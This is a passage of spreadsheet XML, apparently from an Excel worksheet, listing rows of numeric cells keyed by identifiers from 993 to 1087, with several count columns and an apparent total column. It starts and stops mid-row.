        <v>77</v>
      </c>
      <c r="K397" s="7">
        <v>992</v>
      </c>
      <c r="L397" s="8">
        <v>30</v>
      </c>
      <c r="M397" s="8">
        <v>0</v>
      </c>
      <c r="N397" s="8">
        <v>23</v>
      </c>
      <c r="O397" s="8">
        <v>12</v>
      </c>
      <c r="P397" s="8">
        <v>8</v>
      </c>
      <c r="Q397" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="398" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A398" s="7">
        <v>993</v>
      </c>
      <c r="B398" s="8">
        <v>24</v>
      </c>
      <c r="C398" s="8">
        <v>1</v>
      </c>
      <c r="D398" s="8">
        <v>19</v>
      </c>
      <c r="E398" s="8">
        <v>35</v>
      </c>
      <c r="F398" s="8">
        <v>15</v>
      </c>
      <c r="G398" s="8">
        <v>14</v>
      </c>
      <c r="H398" s="8">
        <v>108</v>
      </c>
      <c r="K398" s="7">
        <v>993</v>
      </c>
      <c r="L398" s="8">
        <v>24</v>
      </c>
      <c r="M398" s="8">
        <v>1</v>
      </c>
      <c r="N398" s="8">
        <v>19</v>
      </c>
      <c r="O398" s="8">
        <v>35</v>
      </c>
      <c r="P398" s="8">
        <v>15</v>
      </c>
      <c r="Q398" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="399" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A399" s="7">
        <v>995</v>
      </c>
      <c r="B399" s="8">
        <v>25</v>
      </c>
      <c r="C399" s="8">
        <v>1</v>
      </c>
      <c r="D399" s="8">
        <v>6</v>
      </c>
      <c r="E399" s="8">
        <v>3</v>
      </c>
      <c r="F399" s="8">
        <v>0</v>
      </c>
      <c r="G399" s="8">
        <v>0</v>
      </c>
      <c r="H399" s="8">
        <v>35</v>
      </c>
      <c r="K399" s="7">
        <v>995</v>
      </c>
      <c r="L399" s="8">
        <v>25</v>
      </c>
      <c r="M399" s="8">
        <v>1</v>
      </c>
      <c r="N399" s="8">
        <v>6</v>
      </c>
      <c r="O399" s="8">
        <v>3</v>
      </c>
      <c r="P399" s="8">
        <v>0</v>
      </c>
      <c r="Q399" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="400" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A400" s="7">
        <v>997</v>
      </c>
      <c r="B400" s="8">
        <v>14</v>
      </c>
      <c r="C400" s="8">
        <v>1</v>
      </c>
      <c r="D400" s="8">
        <v>12</v>
      </c>
      <c r="E400" s="8">
        <v>20</v>
      </c>
      <c r="F400" s="8">
        <v>2</v>
      </c>
      <c r="G400" s="8">
        <v>1</v>
      </c>
      <c r="H400" s="8">
        <v>50</v>
      </c>
      <c r="K400" s="7">
        <v>997</v>
      </c>
      <c r="L400" s="8">
        <v>14</v>
      </c>
      <c r="M400" s="8">
        <v>1</v>
      </c>
      <c r="N400" s="8">
        <v>12</v>
      </c>
      <c r="O400" s="8">
        <v>20</v>
      </c>
      <c r="P400" s="8">
        <v>2</v>
      </c>
      <c r="Q400" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="401" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A401" s="7">
        <v>998</v>
      </c>
      <c r="B401" s="8">
        <v>7</v>
      </c>
      <c r="C401" s="8">
        <v>3</v>
      </c>
      <c r="D401" s="8">
        <v>3</v>
      </c>
      <c r="E401" s="8">
        <v>0</v>
      </c>
      <c r="F401" s="8">
        <v>4</v>
      </c>
      <c r="G401" s="8">
        <v>1</v>
      </c>
      <c r="H401" s="8">
        <v>18</v>
      </c>
      <c r="K401" s="7">
        <v>998</v>
      </c>
      <c r="L401" s="8">
        <v>7</v>
      </c>
      <c r="M401" s="8">
        <v>3</v>
      </c>
      <c r="N401" s="8">
        <v>3</v>
      </c>
      <c r="O401" s="8">
        <v>0</v>
      </c>
      <c r="P401" s="8">
        <v>4</v>
      </c>
      <c r="Q401" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="402" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A402" s="7">
        <v>999</v>
      </c>
      <c r="B402" s="8">
        <v>7</v>
      </c>
      <c r="C402" s="8">
        <v>3</v>
      </c>
      <c r="D402" s="8">
        <v>3</v>
      </c>
      <c r="E402" s="8">
        <v>0</v>
      </c>
      <c r="F402" s="8">
        <v>4</v>
      </c>
      <c r="G402" s="8">
        <v>1</v>
      </c>
      <c r="H402" s="8">
        <v>18</v>
      </c>
      <c r="K402" s="7">
        <v>999</v>
      </c>
      <c r="L402" s="8">
        <v>7</v>
      </c>
      <c r="M402" s="8">
        <v>3</v>
      </c>
      <c r="N402" s="8">
        <v>3</v>
      </c>
      <c r="O402" s="8">
        <v>0</v>
      </c>
      <c r="P402" s="8">
        <v>4</v>
      </c>
      <c r="Q402" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="403" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A403" s="7">
        <v>1000</v>
      </c>
      <c r="B403" s="8">
        <v>1</v>
      </c>
      <c r="C403" s="8">
        <v>1</v>
      </c>
      <c r="D403" s="8">
        <v>4</v>
      </c>
      <c r="E403" s="8">
        <v>1</v>
      </c>
      <c r="F403" s="8">
        <v>4</v>
      </c>
      <c r="G403" s="8">
        <v>1</v>
      </c>
      <c r="H403" s="8">
        <v>12</v>
      </c>
      <c r="K403" s="7">
        <v>1000</v>
      </c>
      <c r="L403" s="8">
        <v>1</v>
      </c>
      <c r="M403" s="8">
        <v>1</v>
      </c>
      <c r="N403" s="8">
        <v>4</v>
      </c>
      <c r="O403" s="8">
        <v>1</v>
      </c>
      <c r="P403" s="8">
        <v>4</v>
      </c>
      <c r="Q403" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="404" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A404" s="7">
        <v>1003</v>
      </c>
      <c r="B404" s="8">
        <v>0</v>
      </c>
      <c r="C404" s="8">
        <v>0</v>
      </c>
      <c r="D404" s="8">
        <v>0</v>
      </c>
      <c r="E404" s="8">
        <v>0</v>
      </c>
      <c r="F404" s="8">
        <v>6</v>
      </c>
      <c r="G404" s="8">
        <v>5</v>
      </c>
      <c r="H404" s="8">
        <v>11</v>
      </c>
      <c r="K404" s="7">
        <v>1003</v>
      </c>
      <c r="L404" s="8">
        <v>0</v>
      </c>
      <c r="M404" s="8">
        <v>0</v>
      </c>
      <c r="N404" s="8">
        <v>0</v>
      </c>
      <c r="O404" s="8">
        <v>0</v>
      </c>
      <c r="P404" s="8">
        <v>6</v>
      </c>
      <c r="Q404" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="405" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A405" s="7">
        <v>1012</v>
      </c>
      <c r="B405" s="8">
        <v>7</v>
      </c>
      <c r="C405" s="8">
        <v>1</v>
      </c>
      <c r="D405" s="8">
        <v>5</v>
      </c>
      <c r="E405" s="8">
        <v>22</v>
      </c>
      <c r="F405" s="8">
        <v>3</v>
      </c>
      <c r="G405" s="8">
        <v>2</v>
      </c>
      <c r="H405" s="8">
        <v>40</v>
      </c>
      <c r="K405" s="7">
        <v>1012</v>
      </c>
      <c r="L405" s="8">
        <v>7</v>
      </c>
      <c r="M405" s="8">
        <v>1</v>
      </c>
      <c r="N405" s="8">
        <v>5</v>
      </c>
      <c r="O405" s="8">
        <v>22</v>
      </c>
      <c r="P405" s="8">
        <v>3</v>
      </c>
      <c r="Q405" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="406" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A406" s="7">
        <v>1017</v>
      </c>
      <c r="B406" s="8">
        <v>26</v>
      </c>
      <c r="C406" s="8">
        <v>3</v>
      </c>
      <c r="D406" s="8">
        <v>3</v>
      </c>
      <c r="E406" s="8">
        <v>6</v>
      </c>
      <c r="F406" s="8">
        <v>7</v>
      </c>
      <c r="G406" s="8">
        <v>2</v>
      </c>
      <c r="H406" s="8">
        <v>47</v>
      </c>
      <c r="K406" s="7">
        <v>1017</v>
      </c>
      <c r="L406" s="8">
        <v>26</v>
      </c>
      <c r="M406" s="8">
        <v>3</v>
      </c>
      <c r="N406" s="8">
        <v>3</v>
      </c>
      <c r="O406" s="8">
        <v>6</v>
      </c>
      <c r="P406" s="8">
        <v>7</v>
      </c>
      <c r="Q406" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="407" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A407" s="7">
        <v>1018</v>
      </c>
      <c r="B407" s="8">
        <v>24</v>
      </c>
      <c r="C407" s="8">
        <v>1</v>
      </c>
      <c r="D407" s="8">
        <v>0</v>
      </c>
      <c r="E407" s="8">
        <v>0</v>
      </c>
      <c r="F407" s="8">
        <v>6</v>
      </c>
      <c r="G407" s="8">
        <v>1</v>
      </c>
      <c r="H407" s="8">
        <v>32</v>
      </c>
      <c r="K407" s="7">
        <v>1018</v>
      </c>
      <c r="L407" s="8">
        <v>24</v>
      </c>
      <c r="M407" s="8">
        <v>1</v>
      </c>
      <c r="N407" s="8">
        <v>0</v>
      </c>
      <c r="O407" s="8">
        <v>0</v>
      </c>
      <c r="P407" s="8">
        <v>6</v>
      </c>
      <c r="Q407" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="408" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A408" s="7">
        <v>1025</v>
      </c>
      <c r="B408" s="8">
        <v>20</v>
      </c>
      <c r="C408" s="8">
        <v>0</v>
      </c>
      <c r="D408" s="8">
        <v>0</v>
      </c>
      <c r="E408" s="8">
        <v>0</v>
      </c>
      <c r="F408" s="8">
        <v>2</v>
      </c>
      <c r="G408" s="8">
        <v>3</v>
      </c>
      <c r="H408" s="8">
        <v>25</v>
      </c>
      <c r="K408" s="7">
        <v>1025</v>
      </c>
      <c r="L408" s="8">
        <v>20</v>
      </c>
      <c r="M408" s="8">
        <v>0</v>
      </c>
      <c r="N408" s="8">
        <v>0</v>
      </c>
      <c r="O408" s="8">
        <v>0</v>
      </c>
      <c r="P408" s="8">
        <v>2</v>
      </c>
      <c r="Q408" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="409" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A409" s="7">
        <v>1026</v>
      </c>
      <c r="B409" s="8">
        <v>26</v>
      </c>
      <c r="C409" s="8">
        <v>0</v>
      </c>
      <c r="D409" s="8">
        <v>35</v>
      </c>
      <c r="E409" s="8">
        <v>60</v>
      </c>
      <c r="F409" s="8">
        <v>6</v>
      </c>
      <c r="G409" s="8">
        <v>4</v>
      </c>
      <c r="H409" s="8">
        <v>131</v>
      </c>
      <c r="K409" s="7">
        <v>1026</v>
      </c>
      <c r="L409" s="8">
        <v>26</v>
      </c>
      <c r="M409" s="8">
        <v>0</v>
      </c>
      <c r="N409" s="8">
        <v>35</v>
      </c>
      <c r="O409" s="8">
        <v>60</v>
      </c>
      <c r="P409" s="8">
        <v>6</v>
      </c>
      <c r="Q409" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="410" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A410" s="7">
        <v>1028</v>
      </c>
      <c r="B410" s="8">
        <v>26</v>
      </c>
      <c r="C410" s="8">
        <v>0</v>
      </c>
      <c r="D410" s="8">
        <v>78</v>
      </c>
      <c r="E410" s="8">
        <v>15</v>
      </c>
      <c r="F410" s="8">
        <v>41</v>
      </c>
      <c r="G410" s="8">
        <v>15</v>
      </c>
      <c r="H410" s="8">
        <v>175</v>
      </c>
      <c r="K410" s="7">
        <v>1028</v>
      </c>
      <c r="L410" s="8">
        <v>26</v>
      </c>
      <c r="M410" s="8">
        <v>0</v>
      </c>
      <c r="N410" s="8">
        <v>78</v>
      </c>
      <c r="O410" s="8">
        <v>15</v>
      </c>
      <c r="P410" s="8">
        <v>41</v>
      </c>
      <c r="Q410" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="411" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A411" s="7">
        <v>1029</v>
      </c>
      <c r="B411" s="8">
        <v>6</v>
      </c>
      <c r="C411" s="8">
        <v>1</v>
      </c>
      <c r="D411" s="8">
        <v>2966</v>
      </c>
      <c r="E411" s="8">
        <v>6045</v>
      </c>
      <c r="F411" s="8">
        <v>76</v>
      </c>
      <c r="G411" s="8">
        <v>69</v>
      </c>
      <c r="H411" s="8">
        <v>9163</v>
      </c>
      <c r="K411" s="7">
        <v>1029</v>
      </c>
      <c r="L411" s="8">
        <v>6</v>
      </c>
      <c r="M411" s="8">
        <v>1</v>
      </c>
      <c r="N411" s="8">
        <v>2966</v>
      </c>
      <c r="O411" s="8">
        <v>6045</v>
      </c>
      <c r="P411" s="8">
        <v>76</v>
      </c>
      <c r="Q411" s="8">
        <v>69</v>
      </c>
    </row>
    <row r="412" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A412" s="7">
        <v>1033</v>
      </c>
      <c r="B412" s="8">
        <v>14</v>
      </c>
      <c r="C412" s="8">
        <v>1</v>
      </c>
      <c r="D412" s="8">
        <v>8</v>
      </c>
      <c r="E412" s="8">
        <v>19</v>
      </c>
      <c r="F412" s="8">
        <v>5</v>
      </c>
      <c r="G412" s="8">
        <v>11</v>
      </c>
      <c r="H412" s="8">
        <v>58</v>
      </c>
      <c r="K412" s="7">
        <v>1033</v>
      </c>
      <c r="L412" s="8">
        <v>14</v>
      </c>
      <c r="M412" s="8">
        <v>1</v>
      </c>
      <c r="N412" s="8">
        <v>8</v>
      </c>
      <c r="O412" s="8">
        <v>19</v>
      </c>
      <c r="P412" s="8">
        <v>5</v>
      </c>
      <c r="Q412" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="413" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A413" s="7">
        <v>1034</v>
      </c>
      <c r="B413" s="8">
        <v>0</v>
      </c>
      <c r="C413" s="8">
        <v>0</v>
      </c>
      <c r="D413" s="8">
        <v>8</v>
      </c>
      <c r="E413" s="8">
        <v>8</v>
      </c>
      <c r="F413" s="8">
        <v>6</v>
      </c>
      <c r="G413" s="8">
        <v>0</v>
      </c>
      <c r="H413" s="8">
        <v>22</v>
      </c>
      <c r="K413" s="7">
        <v>1034</v>
      </c>
      <c r="L413" s="8">
        <v>0</v>
      </c>
      <c r="M413" s="8">
        <v>0</v>
      </c>
      <c r="N413" s="8">
        <v>8</v>
      </c>
      <c r="O413" s="8">
        <v>8</v>
      </c>
      <c r="P413" s="8">
        <v>6</v>
      </c>
      <c r="Q413" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="414" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A414" s="7">
        <v>1035</v>
      </c>
      <c r="B414" s="8">
        <v>6</v>
      </c>
      <c r="C414" s="8">
        <v>1</v>
      </c>
      <c r="D414" s="8">
        <v>51</v>
      </c>
      <c r="E414" s="8">
        <v>254</v>
      </c>
      <c r="F414" s="8">
        <v>142</v>
      </c>
      <c r="G414" s="8">
        <v>98</v>
      </c>
      <c r="H414" s="8">
        <v>552</v>
      </c>
      <c r="K414" s="7">
        <v>1035</v>
      </c>
      <c r="L414" s="8">
        <v>6</v>
      </c>
      <c r="M414" s="8">
        <v>1</v>
      </c>
      <c r="N414" s="8">
        <v>51</v>
      </c>
      <c r="O414" s="8">
        <v>254</v>
      </c>
      <c r="P414" s="8">
        <v>142</v>
      </c>
      <c r="Q414" s="8">
        <v>98</v>
      </c>
    </row>
    <row r="415" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A415" s="7">
        <v>1047</v>
      </c>
      <c r="B415" s="8">
        <v>5</v>
      </c>
      <c r="C415" s="8">
        <v>2</v>
      </c>
      <c r="D415" s="8">
        <v>0</v>
      </c>
      <c r="E415" s="8">
        <v>0</v>
      </c>
      <c r="F415" s="8">
        <v>5</v>
      </c>
      <c r="G415" s="8">
        <v>0</v>
      </c>
      <c r="H415" s="8">
        <v>12</v>
      </c>
      <c r="K415" s="7">
        <v>1047</v>
      </c>
      <c r="L415" s="8">
        <v>5</v>
      </c>
      <c r="M415" s="8">
        <v>2</v>
      </c>
      <c r="N415" s="8">
        <v>0</v>
      </c>
      <c r="O415" s="8">
        <v>0</v>
      </c>
      <c r="P415" s="8">
        <v>5</v>
      </c>
      <c r="Q415" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="416" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A416" s="7">
        <v>1048</v>
      </c>
      <c r="B416" s="8">
        <v>6</v>
      </c>
      <c r="C416" s="8">
        <v>1</v>
      </c>
      <c r="D416" s="8">
        <v>28</v>
      </c>
      <c r="E416" s="8">
        <v>50</v>
      </c>
      <c r="F416" s="8">
        <v>42</v>
      </c>
      <c r="G416" s="8">
        <v>15</v>
      </c>
      <c r="H416" s="8">
        <v>142</v>
      </c>
      <c r="K416" s="7">
        <v>1048</v>
      </c>
      <c r="L416" s="8">
        <v>6</v>
      </c>
      <c r="M416" s="8">
        <v>1</v>
      </c>
      <c r="N416" s="8">
        <v>28</v>
      </c>
      <c r="O416" s="8">
        <v>50</v>
      </c>
      <c r="P416" s="8">
        <v>42</v>
      </c>
      <c r="Q416" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="417" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A417" s="7">
        <v>1051</v>
      </c>
      <c r="B417" s="8">
        <v>6</v>
      </c>
      <c r="C417" s="8">
        <v>0</v>
      </c>
      <c r="D417" s="8">
        <v>0</v>
      </c>
      <c r="E417" s="8">
        <v>0</v>
      </c>
      <c r="F417" s="8">
        <v>6</v>
      </c>
      <c r="G417" s="8">
        <v>2</v>
      </c>
      <c r="H417" s="8">
        <v>14</v>
      </c>
      <c r="K417" s="7">
        <v>1051</v>
      </c>
      <c r="L417" s="8">
        <v>6</v>
      </c>
      <c r="M417" s="8">
        <v>0</v>
      </c>
      <c r="N417" s="8">
        <v>0</v>
      </c>
      <c r="O417" s="8">
        <v>0</v>
      </c>
      <c r="P417" s="8">
        <v>6</v>
      </c>
      <c r="Q417" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="418" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A418" s="7">
        <v>1052</v>
      </c>
      <c r="B418" s="8">
        <v>26</v>
      </c>
      <c r="C418" s="8">
        <v>1</v>
      </c>
      <c r="D418" s="8">
        <v>10</v>
      </c>
      <c r="E418" s="8">
        <v>1</v>
      </c>
      <c r="F418" s="8">
        <v>17</v>
      </c>
      <c r="G418" s="8">
        <v>7</v>
      </c>
      <c r="H418" s="8">
        <v>62</v>
      </c>
      <c r="K418" s="7">
        <v>1052</v>
      </c>
      <c r="L418" s="8">
        <v>26</v>
      </c>
      <c r="M418" s="8">
        <v>1</v>
      </c>
      <c r="N418" s="8">
        <v>10</v>
      </c>
      <c r="O418" s="8">
        <v>1</v>
      </c>
      <c r="P418" s="8">
        <v>17</v>
      </c>
      <c r="Q418" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="419" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A419" s="7">
        <v>1054</v>
      </c>
      <c r="B419" s="8">
        <v>25</v>
      </c>
      <c r="C419" s="8">
        <v>1</v>
      </c>
      <c r="D419" s="8">
        <v>2</v>
      </c>
      <c r="E419" s="8">
        <v>2</v>
      </c>
      <c r="F419" s="8">
        <v>7</v>
      </c>
      <c r="G419" s="8">
        <v>1</v>
      </c>
      <c r="H419" s="8">
        <v>38</v>
      </c>
      <c r="K419" s="7">
        <v>1054</v>
      </c>
      <c r="L419" s="8">
        <v>25</v>
      </c>
      <c r="M419" s="8">
        <v>1</v>
      </c>
      <c r="N419" s="8">
        <v>2</v>
      </c>
      <c r="O419" s="8">
        <v>2</v>
      </c>
      <c r="P419" s="8">
        <v>7</v>
      </c>
      <c r="Q419" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="420" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A420" s="7">
        <v>1057</v>
      </c>
      <c r="B420" s="8">
        <v>26</v>
      </c>
      <c r="C420" s="8">
        <v>1</v>
      </c>
      <c r="D420" s="8">
        <v>20</v>
      </c>
      <c r="E420" s="8">
        <v>460</v>
      </c>
      <c r="F420" s="8">
        <v>27</v>
      </c>
      <c r="G420" s="8">
        <v>47</v>
      </c>
      <c r="H420" s="8">
        <v>581</v>
      </c>
      <c r="K420" s="7">
        <v>1057</v>
      </c>
      <c r="L420" s="8">
        <v>26</v>
      </c>
      <c r="M420" s="8">
        <v>1</v>
      </c>
      <c r="N420" s="8">
        <v>20</v>
      </c>
      <c r="O420" s="8">
        <v>460</v>
      </c>
      <c r="P420" s="8">
        <v>27</v>
      </c>
      <c r="Q420" s="8">
        <v>47</v>
      </c>
    </row>
    <row r="421" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A421" s="7">
        <v>1058</v>
      </c>
      <c r="B421" s="8">
        <v>14</v>
      </c>
      <c r="C421" s="8">
        <v>2</v>
      </c>
      <c r="D421" s="8">
        <v>4</v>
      </c>
      <c r="E421" s="8">
        <v>0</v>
      </c>
      <c r="F421" s="8">
        <v>0</v>
      </c>
      <c r="G421" s="8">
        <v>7</v>
      </c>
      <c r="H421" s="8">
        <v>27</v>
      </c>
      <c r="K421" s="7">
        <v>1058</v>
      </c>
      <c r="L421" s="8">
        <v>14</v>
      </c>
      <c r="M421" s="8">
        <v>2</v>
      </c>
      <c r="N421" s="8">
        <v>4</v>
      </c>
      <c r="O421" s="8">
        <v>0</v>
      </c>
      <c r="P421" s="8">
        <v>0</v>
      </c>
      <c r="Q421" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="422" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A422" s="7">
        <v>1061</v>
      </c>
      <c r="B422" s="8">
        <v>0</v>
      </c>
      <c r="C422" s="8">
        <v>0</v>
      </c>
      <c r="D422" s="8">
        <v>0</v>
      </c>
      <c r="E422" s="8">
        <v>0</v>
      </c>
      <c r="F422" s="8">
        <v>9</v>
      </c>
      <c r="G422" s="8">
        <v>14</v>
      </c>
      <c r="H422" s="8">
        <v>23</v>
      </c>
      <c r="K422" s="7">
        <v>1061</v>
      </c>
      <c r="L422" s="8">
        <v>0</v>
      </c>
      <c r="M422" s="8">
        <v>0</v>
      </c>
      <c r="N422" s="8">
        <v>0</v>
      </c>
      <c r="O422" s="8">
        <v>0</v>
      </c>
      <c r="P422" s="8">
        <v>9</v>
      </c>
      <c r="Q422" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="423" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A423" s="7">
        <v>1067</v>
      </c>
      <c r="B423" s="8">
        <v>25</v>
      </c>
      <c r="C423" s="8">
        <v>1</v>
      </c>
      <c r="D423" s="8">
        <v>40</v>
      </c>
      <c r="E423" s="8">
        <v>122</v>
      </c>
      <c r="F423" s="8">
        <v>25</v>
      </c>
      <c r="G423" s="8">
        <v>51</v>
      </c>
      <c r="H423" s="8">
        <v>264</v>
      </c>
      <c r="K423" s="7">
        <v>1067</v>
      </c>
      <c r="L423" s="8">
        <v>25</v>
      </c>
      <c r="M423" s="8">
        <v>1</v>
      </c>
      <c r="N423" s="8">
        <v>40</v>
      </c>
      <c r="O423" s="8">
        <v>122</v>
      </c>
      <c r="P423" s="8">
        <v>25</v>
      </c>
      <c r="Q423" s="8">
        <v>51</v>
      </c>
    </row>
    <row r="424" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A424" s="7">
        <v>1068</v>
      </c>
      <c r="B424" s="8">
        <v>26</v>
      </c>
      <c r="C424" s="8">
        <v>1</v>
      </c>
      <c r="D424" s="8">
        <v>12</v>
      </c>
      <c r="E424" s="8">
        <v>0</v>
      </c>
      <c r="F424" s="8">
        <v>2</v>
      </c>
      <c r="G424" s="8">
        <v>1</v>
      </c>
      <c r="H424" s="8">
        <v>42</v>
      </c>
      <c r="K424" s="7">
        <v>1068</v>
      </c>
      <c r="L424" s="8">
        <v>26</v>
      </c>
      <c r="M424" s="8">
        <v>1</v>
      </c>
      <c r="N424" s="8">
        <v>12</v>
      </c>
      <c r="O424" s="8">
        <v>0</v>
      </c>
      <c r="P424" s="8">
        <v>2</v>
      </c>
      <c r="Q424" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="425" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A425" s="7">
        <v>1069</v>
      </c>
      <c r="B425" s="8">
        <v>25</v>
      </c>
      <c r="C425" s="8">
        <v>2</v>
      </c>
      <c r="D425" s="8">
        <v>8</v>
      </c>
      <c r="E425" s="8">
        <v>0</v>
      </c>
      <c r="F425" s="8">
        <v>2</v>
      </c>
      <c r="G425" s="8">
        <v>2</v>
      </c>
      <c r="H425" s="8">
        <v>39</v>
      </c>
      <c r="K425" s="7">
        <v>1069</v>
      </c>
      <c r="L425" s="8">
        <v>25</v>
      </c>
      <c r="M425" s="8">
        <v>2</v>
      </c>
      <c r="N425" s="8">
        <v>8</v>
      </c>
      <c r="O425" s="8">
        <v>0</v>
      </c>
      <c r="P425" s="8">
        <v>2</v>
      </c>
      <c r="Q425" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="426" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A426" s="7">
        <v>1070</v>
      </c>
      <c r="B426" s="8">
        <v>25</v>
      </c>
      <c r="C426" s="8">
        <v>0</v>
      </c>
      <c r="D426" s="8">
        <v>14</v>
      </c>
      <c r="E426" s="8">
        <v>263</v>
      </c>
      <c r="F426" s="8">
        <v>9</v>
      </c>
      <c r="G426" s="8">
        <v>7</v>
      </c>
      <c r="H426" s="8">
        <v>318</v>
      </c>
      <c r="K426" s="7">
        <v>1070</v>
      </c>
      <c r="L426" s="8">
        <v>25</v>
      </c>
      <c r="M426" s="8">
        <v>0</v>
      </c>
      <c r="N426" s="8">
        <v>14</v>
      </c>
      <c r="O426" s="8">
        <v>263</v>
      </c>
      <c r="P426" s="8">
        <v>9</v>
      </c>
      <c r="Q426" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="427" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A427" s="7">
        <v>1072</v>
      </c>
      <c r="B427" s="8">
        <v>6</v>
      </c>
      <c r="C427" s="8">
        <v>1</v>
      </c>
      <c r="D427" s="8">
        <v>8</v>
      </c>
      <c r="E427" s="8">
        <v>14</v>
      </c>
      <c r="F427" s="8">
        <v>4</v>
      </c>
      <c r="G427" s="8">
        <v>7</v>
      </c>
      <c r="H427" s="8">
        <v>40</v>
      </c>
      <c r="K427" s="7">
        <v>1072</v>
      </c>
      <c r="L427" s="8">
        <v>6</v>
      </c>
      <c r="M427" s="8">
        <v>1</v>
      </c>
      <c r="N427" s="8">
        <v>8</v>
      </c>
      <c r="O427" s="8">
        <v>14</v>
      </c>
      <c r="P427" s="8">
        <v>4</v>
      </c>
      <c r="Q427" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="428" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A428" s="7">
        <v>1076</v>
      </c>
      <c r="B428" s="8">
        <v>25</v>
      </c>
      <c r="C428" s="8">
        <v>0</v>
      </c>
      <c r="D428" s="8">
        <v>10</v>
      </c>
      <c r="E428" s="8">
        <v>20</v>
      </c>
      <c r="F428" s="8">
        <v>13</v>
      </c>
      <c r="G428" s="8">
        <v>3</v>
      </c>
      <c r="H428" s="8">
        <v>71</v>
      </c>
      <c r="K428" s="7">
        <v>1076</v>
      </c>
      <c r="L428" s="8">
        <v>25</v>
      </c>
      <c r="M428" s="8">
        <v>0</v>
      </c>
      <c r="N428" s="8">
        <v>10</v>
      </c>
      <c r="O428" s="8">
        <v>20</v>
      </c>
      <c r="P428" s="8">
        <v>13</v>
      </c>
      <c r="Q428" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="429" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A429" s="7">
        <v>1078</v>
      </c>
      <c r="B429" s="8">
        <v>25</v>
      </c>
      <c r="C429" s="8">
        <v>2</v>
      </c>
      <c r="D429" s="8">
        <v>0</v>
      </c>
      <c r="E429" s="8">
        <v>2</v>
      </c>
      <c r="F429" s="8">
        <v>1</v>
      </c>
      <c r="G429" s="8">
        <v>6</v>
      </c>
      <c r="H429" s="8">
        <v>36</v>
      </c>
      <c r="K429" s="7">
        <v>1078</v>
      </c>
      <c r="L429" s="8">
        <v>25</v>
      </c>
      <c r="M429" s="8">
        <v>2</v>
      </c>
      <c r="N429" s="8">
        <v>0</v>
      </c>
      <c r="O429" s="8">
        <v>2</v>
      </c>
      <c r="P429" s="8">
        <v>1</v>
      </c>
      <c r="Q429" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="430" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A430" s="7">
        <v>1083</v>
      </c>
      <c r="B430" s="8">
        <v>25</v>
      </c>
      <c r="C430" s="8">
        <v>0</v>
      </c>
      <c r="D430" s="8">
        <v>0</v>
      </c>
      <c r="E430" s="8">
        <v>0</v>
      </c>
      <c r="F430" s="8">
        <v>24</v>
      </c>
      <c r="G430" s="8">
        <v>42</v>
      </c>
      <c r="H430" s="8">
        <v>91</v>
      </c>
      <c r="K430" s="7">
        <v>1083</v>
      </c>
      <c r="L430" s="8">
        <v>25</v>
      </c>
      <c r="M430" s="8">
        <v>0</v>
      </c>
      <c r="N430" s="8">
        <v>0</v>
      </c>
      <c r="O430" s="8">
        <v>0</v>
      </c>
      <c r="P430" s="8">
        <v>24</v>
      </c>
      <c r="Q430" s="8">
        <v>42</v>
      </c>
    </row>
    <row r="431" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A431" s="7">
        <v>1087</v>
      </c>
      <c r="B431" s="8">
        <v>26</v>
      </c>
      <c r="C431" s="8">
        <v>1</v>
      </c>
      <c r="D431" s="8">
        <v>45</v>
      </c>
      <c r="E431" s="8">
        <v>105</v>
      </c>
